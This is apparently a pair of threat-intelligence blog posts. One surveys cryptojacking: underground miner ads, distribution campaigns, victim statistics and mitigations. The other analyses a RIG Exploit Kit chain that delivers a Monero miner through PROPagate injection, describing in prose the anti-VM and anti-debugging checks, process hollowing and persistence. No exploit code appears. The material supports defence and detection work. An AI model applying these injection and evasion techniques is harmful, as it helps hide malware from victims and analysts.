
Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

